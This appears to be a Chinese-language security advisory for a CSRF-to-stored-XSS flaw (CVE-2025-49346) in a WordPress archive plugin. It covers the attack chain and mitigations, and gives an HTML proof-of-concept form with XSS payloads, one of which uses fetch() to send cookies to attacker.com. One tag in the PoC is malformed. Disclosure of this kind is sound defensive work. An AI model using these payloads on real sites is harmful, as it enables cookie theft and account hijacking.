CVE-2025-49346 WordPress Simple Archive Generator插件CSRF存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-49346

漏洞类型

CSRF + 存储型XSS

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WordPress Simple Archive Generator插件（simple-archive-generator）

漏洞概述

CVE-2025-49346是WordPress Simple Archive Generator插件中的一个高危安全漏洞，CVSS评分达到7.1分。该漏洞属于跨站请求伪造（CSRF）与存储型跨站脚本（Stored XSS）的组合漏洞，攻击者可利用此漏洞在受害者的浏览器中执行恶意JavaScript代码，进而窃取会话Cookie、劫持用户账户或进行其他恶意操作。

Simple Archive Generator是一款用于创建和管理WordPress内容存档的流行插件，版本5.2及以下均受影响。由于该插件在处理用户输入时缺乏充分的CSRF令牌验证和输入过滤，攻击者可以构造恶意请求，诱使已登录的管理员访问包含恶意脚本的页面，从而在存档内容中注入并存储XSS payload。一旦存储型XSS被触发，所有访问该存档页面的用户都会遭受攻击，攻击范围广泛且持久。

该漏洞无需特殊权限即可发起攻击，但需要用户交互（如点击恶意链接或访问恶意页面）。攻击成功后，攻击者可以在受害者浏览器中执行任意JavaScript代码，获取敏感信息、修改页面内容或进行进一步的攻击。由于是存储型XSS，恶意脚本会被永久保存在服务器端，对所有访问者持续构成威胁。

技术细节

该漏洞的根本原因在于Simple Archive Generator插件在处理存档数据时存在两个安全缺陷：

1. **CSRF保护缺失**：插件未实现有效的CSRF令牌验证机制。WordPress插件应使用wp_verify_nonce()函数验证请求的合法性，但该插件在处理存档创建和编辑请求时缺少此验证，使得攻击者可以伪造管理员的请求。

2. **输入过滤不足**：插件在将用户输入存储到数据库前，未对特殊字符进行适当的转义或过滤。虽然某些输入字段可能经过了基础的HTML编码，但攻击者可以通过构造特殊的payload绕过过滤，成功注入<script>标签或事件处理器（如onerror、onload等）。

**利用方式**：
- 攻击者首先构造一个包含恶意JavaScript代码的HTML表单或链接
- 通过社会工程学手段诱使已登录的管理员访问该恶意链接
- 管理员的浏览器会自动向目标WordPress站点发送请求，由于浏览器自动携带Cookie，服务器会认为这是合法的管理员操作
- 恶意payload被存储到数据库的存档内容中
- 当其他用户访问包含恶意内容的存档页面时，XSS payload会在其浏览器中执行

**攻击示例**：攻击者可以注入类似<img src=x onerror=alert(document.cookie)>的payload，当页面加载时，onerror事件会被触发，执行恶意JavaScript代码窃取用户的Cookie信息。

攻击链分析

STEP 1

1

攻击者创建恶意HTML页面，包含自动提交的表单，指向目标WordPress站点的admin-post.php

STEP 2

2

表单中包含存储型XSS payload（如<script>标签或事件处理器onerror）

STEP 3

3

攻击者通过钓鱼邮件、社交工程或其他方式诱使已登录的管理员访问恶意页面

STEP 4

4

管理员浏览器自动发送POST请求到目标站点，由于携带有效会话Cookie，服务器处理该请求

STEP 5

5

插件将未经过滤的XSS payload存储到数据库的存档内容中

STEP 6

6

普通用户访问包含恶意内容的存档页面时，XSS payload在其浏览器中执行

STEP 7

7

恶意脚本窃取用户Cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-49346 PoC: CSRF to Stored XSS in Simple Archive Generator -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF PoC - Simple Archive Generator XSS</title>
</head>
<body>
    <h2>CVE-2025-49346 CSRF Stored XSS PoC</h2>
    <p>Click the button below to trigger the vulnerability (requires admin login):</p>
    
    <form action="http://target-site/wp-admin/admin-post.php" method="POST" id="exploitForm">
        <!-- Base parameters for archive creation -->
        <input type="hidden" name="action" value="save_archive">
        <input type="hidden" name="post_type" value="sag_archive">
        
        <!-- Archive title with XSS payload -->
        <input type="hidden" name="post_title" value="Archive<script>alert('XSS by CVE-2025-49346')</script>">
        
        <!-- Archive content with XSS payload -->
        <input type="hidden" name="post_content" value="<img src=x onerror=alert(document.cookie)>"
        
        <!-- Additional required fields -->
        <input type="hidden" name="sag_options[description]" value="<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>">
        <input type="hidden" name="sag_options[category]" value="1">
    </form>
    
    <button onclick="document.getElementById('exploitForm').submit()">Execute Exploit</button>
    
    <script>
        // Auto-submit on page load (for seamless attack)
        // window.onload = function() { document.getElementById('exploitForm').submit(); };
    </script>
</body>
</html>

影响范围

WordPress Simple Archive Generator (simple-archive-generator) <= 5.2

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）禁用或删除Simple Archive Generator插件；2）使用Web应用防火墙（WAF）规则拦截包含常见XSS payload的请求；3）临时禁用非管理员用户的存档创建权限；4）启用WordPress的强制HTTPS和HttpOnly Cookie设置；5）监控admin-post.php和ajax请求的异常模式；6）考虑使用其他具有类似功能但安全性更好的替代插件。